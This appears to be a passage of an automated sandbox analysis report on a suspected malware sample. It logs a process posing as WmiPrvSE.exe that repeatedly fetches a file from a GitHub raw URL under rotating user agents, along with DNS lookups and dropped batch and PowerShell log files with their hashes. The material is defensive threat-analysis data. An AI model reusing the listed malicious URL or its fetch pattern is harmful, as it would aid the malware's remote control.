                                          raw.githubusercontent.com
                                          IN A
                                          Response
                                          raw.githubusercontent.com
                                          IN A
                                          185.199.110.133
                                          raw.githubusercontent.com
                                          IN A
                                          185.199.111.133
                                          raw.githubusercontent.com
                                          IN A
                                          185.199.108.133
                                          raw.githubusercontent.com
                                          IN A
                                          185.199.109.133
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:29:01 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600020-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841741.206968,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: a15c5b71e4d756129bff8f22ca44d0252ae9e134
                                          Expires: Sun, 22 Dec 2024 04:34:01 GMT
                                          Source-Age: 228
                                        • flag-us
                                          DNS
                                          133.110.199.185.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          133.110.199.185.in-addr.arpa
                                          IN PTR
                                          Response
                                          133.110.199.185.in-addr.arpa
                                          IN PTR
                                          cdn-185-199-110-133githubcom
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:29:14 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lon4258-LON
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841754.355583,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: 9687e36e665bead5408d5ff57cde745dfb9700ac
                                          Expires: Sun, 22 Dec 2024 04:34:14 GMT
                                          Source-Age: 161
                                        • flag-us
                                          DNS
                                          50.23.12.20.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          50.23.12.20.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          206.23.85.13.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          206.23.85.13.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          65.139.73.23.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          65.139.73.23.in-addr.arpa
                                          IN PTR
                                          Response
                                          65.139.73.23.in-addr.arpa
                                          IN PTR
                                          a23-73-139-65deploystaticakamaitechnologiescom
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:29:29 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600039-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841770.662053,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: 6a706c119f1307aeaa872a3e587e373529c487cd
                                          Expires: Sun, 22 Dec 2024 04:34:29 GMT
                                          Source-Age: 256
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:29:41 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600083-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841781.471472,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: 953e7901b703ededd798c05b19c8e6df543f00cd
                                          Expires: Sun, 22 Dec 2024 04:34:41 GMT
                                          Source-Age: 268
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:29:55 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lon420112-LON
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841795.165508,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: 89320ee43a42c83a45c1b35555764241b58f3e4e
                                          Expires: Sun, 22 Dec 2024 04:34:55 GMT
                                          Source-Age: 202
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:30:08 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600036-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841808.412225,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: 496a335da1f09cb9391eb4e8cdf3ae4c86baedf2
                                          Expires: Sun, 22 Dec 2024 04:35:08 GMT
                                          Source-Age: 295
                                        • flag-us
                                          DNS
                                          48.229.111.52.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          48.229.111.52.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:30:20 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600094-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841821.833181,VS0,VE3
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: 5225e74bce1ee9127072b92d4cefd5bd6d061e17
                                          Expires: Sun, 22 Dec 2024 04:35:20 GMT
                                          Source-Age: 4
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:30:28 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600058-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841829.600212,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: a91384b30d45fa1945f4c1872cec39ea1530cafe
                                          Expires: Sun, 22 Dec 2024 04:35:28 GMT
                                          Source-Age: 12
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:30:42 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600039-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841843.903808,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: e69e6572d3f9527b0ea53993e77c0f5fff3567f1
                                          Expires: Sun, 22 Dec 2024 04:35:42 GMT
                                          Source-Age: 26
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:30:56 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600023-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 3
                                          X-Timer: S1734841856.121539,VS0,VE0
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: f1d1c2d8e2fed86d87a1d98360e117ec56ebfc3a
                                          Expires: Sun, 22 Dec 2024 04:35:56 GMT
                                          Source-Age: 39
                                        • flag-us
                                          GET
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          WmiPrvSE.exe
                                          Remote address:
                                          185.199.110.133:443
                                          Request
                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: raw.githubusercontent.com
                                          Connection: Keep-Alive
                                          Response
                                          HTTP/1.1 200 OK
                                          Connection: keep-alive
                                          Content-Length: 4
                                          Cache-Control: max-age=300
                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                          Content-Type: text/plain; charset=utf-8
                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                          Strict-Transport-Security: max-age=31536000
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: deny
                                          X-XSS-Protection: 1; mode=block
                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                          Accept-Ranges: bytes
                                          Date: Sun, 22 Dec 2024 04:31:03 GMT
                                          Via: 1.1 varnish
                                          X-Served-By: cache-lcy-eglc8600044-LCY
                                          X-Cache: HIT
                                          X-Cache-Hits: 1
                                          X-Timer: S1734841864.881667,VS0,VE1
                                          Vary: Authorization,Accept-Encoding,Origin
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          X-Fastly-Request-ID: 35acf4955571c22ec29ba72af8ff951d8f3068cd
                                          Expires: Sun, 22 Dec 2024 04:36:03 GMT
                                          Source-Age: 47
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          914 B
                                          5.1kB
                                          8
                                          9

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          896 B
                                          5.1kB
                                          8
                                          10

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          897 B
                                          5.1kB
                                          8
                                          9

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          914 B
                                          5.1kB
                                          8
                                          9

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          861 B
                                          5.1kB
                                          8
                                          10

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          896 B
                                          5.1kB
                                          8
                                          9

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          914 B
                                          5.1kB
                                          8
                                          9

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          897 B
                                          5.1kB
                                          8
                                          9

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          896 B
                                          5.1kB
                                          8
                                          9

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          861 B
                                          5.1kB
                                          8
                                          10

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 185.199.110.133:443
                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                          tls, http
                                          WmiPrvSE.exe
                                          861 B
                                          5.1kB
                                          8
                                          9

                                          HTTP Request

                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                          HTTP Response

                                          200
                                        • 8.8.8.8:53
                                          104.219.191.52.in-addr.arpa
                                          dns
                                          73 B
                                          147 B
                                          1
                                          1

                                          DNS Request

                                          104.219.191.52.in-addr.arpa

                                        • 8.8.8.8:53
                                          172.210.232.199.in-addr.arpa
                                          dns
                                          74 B
                                          128 B
                                          1
                                          1

                                          DNS Request

                                          172.210.232.199.in-addr.arpa

                                        • 8.8.8.8:53
                                          95.221.229.192.in-addr.arpa
                                          dns
                                          73 B
                                          144 B
                                          1
                                          1

                                          DNS Request

                                          95.221.229.192.in-addr.arpa

                                        • 8.8.8.8:53
                                          22.160.190.20.in-addr.arpa
                                          dns
                                          72 B
                                          158 B
                                          1
                                          1

                                          DNS Request

                                          22.160.190.20.in-addr.arpa

                                        • 8.8.8.8:53
                                          228.249.119.40.in-addr.arpa
                                          dns
                                          73 B
                                          159 B
                                          1
                                          1

                                          DNS Request

                                          228.249.119.40.in-addr.arpa

                                        • 8.8.8.8:53
                                          raw.githubusercontent.com
                                          dns
                                          WmiPrvSE.exe
                                          71 B
                                          135 B
                                          1
                                          1

                                          DNS Request

                                          raw.githubusercontent.com

                                          DNS Response

                                          185.199.110.133
                                          185.199.111.133
                                          185.199.108.133
                                          185.199.109.133

                                        • 8.8.8.8:53
                                          133.110.199.185.in-addr.arpa
                                          dns
                                          74 B
                                          118 B
                                          1
                                          1

                                          DNS Request

                                          133.110.199.185.in-addr.arpa

                                        • 8.8.8.8:53
                                          50.23.12.20.in-addr.arpa
                                          dns
                                          70 B
                                          156 B
                                          1
                                          1

                                          DNS Request

                                          50.23.12.20.in-addr.arpa

                                        • 8.8.8.8:53
                                          206.23.85.13.in-addr.arpa
                                          dns
                                          71 B
                                          145 B
                                          1
                                          1

                                          DNS Request

                                          206.23.85.13.in-addr.arpa

                                        • 8.8.8.8:53
                                          65.139.73.23.in-addr.arpa
                                          dns
                                          71 B
                                          135 B
                                          1
                                          1

                                          DNS Request

                                          65.139.73.23.in-addr.arpa

                                        • 8.8.8.8:53
                                          48.229.111.52.in-addr.arpa
                                          dns
                                          72 B
                                          158 B
                                          1
                                          1

                                          DNS Request

                                          48.229.111.52.in-addr.arpa

                                        • 8.8.8.8:53

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

                                          Filesize

                                          1KB

                                          MD5

                                          baf55b95da4a601229647f25dad12878

                                          SHA1

                                          abc16954ebfd213733c4493fc1910164d825cac8

                                          SHA256

                                          ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                          SHA512

                                          24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                          Filesize

                                          2KB

                                          MD5

                                          d85ba6ff808d9e5444a4b369f5bc2730

                                          SHA1

                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                          SHA256

                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                          SHA512

                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          944B

                                          MD5

                                          bd5940f08d0be56e65e5f2aaf47c538e

                                          SHA1

                                          d7e31b87866e5e383ab5499da64aba50f03e8443

                                          SHA256

                                          2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                                          SHA512

                                          c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          944B

                                          MD5

                                          cadef9abd087803c630df65264a6c81c

                                          SHA1

                                          babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                          SHA256

                                          cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                          SHA512

                                          7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          944B

                                          MD5

                                          d28a889fd956d5cb3accfbaf1143eb6f

                                          SHA1

                                          157ba54b365341f8ff06707d996b3635da8446f7

                                          SHA256

                                          21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                          SHA512

                                          0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          944B

                                          MD5

                                          e243a38635ff9a06c87c2a61a2200656

                                          SHA1

                                          ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

                                          SHA256

                                          af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

                                          SHA512

                                          4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          944B

                                          MD5

                                          5f0ddc7f3691c81ee14d17b419ba220d

                                          SHA1

                                          f0ef5fde8bab9d17c0b47137e014c91be888ee53

                                          SHA256

                                          a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

                                          SHA512

                                          2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

                                        • C:\Users\Admin\AppData\Local\Temp\574RqM7W2b.bat

                                          Filesize

                                          229B

                                          MD5

                                          84ed24cef940f987468cf1c769391b0a

                                          SHA1

                                          334b50a9e076cb8a5ce16da94121aa78b4ef3a5c

                                          SHA256

                                          caf6416bf64b9f012f1472844923614696a11e47c55a2057bf126e83cda7cce0

                                          SHA512

                                          e3d1958fe19f56ec4ecf6697f7fc5e264917c01c794283e46b3ad74fdd0d744b0b73baaacee468435dddf6507686bb3b8edf545235a4b9bda836c34561ada3b3

                                        • C:\Users\Admin\AppData\Local\Temp\D5faDLbbQ0.bat

                                          Filesize

                                          229B

                                          MD5

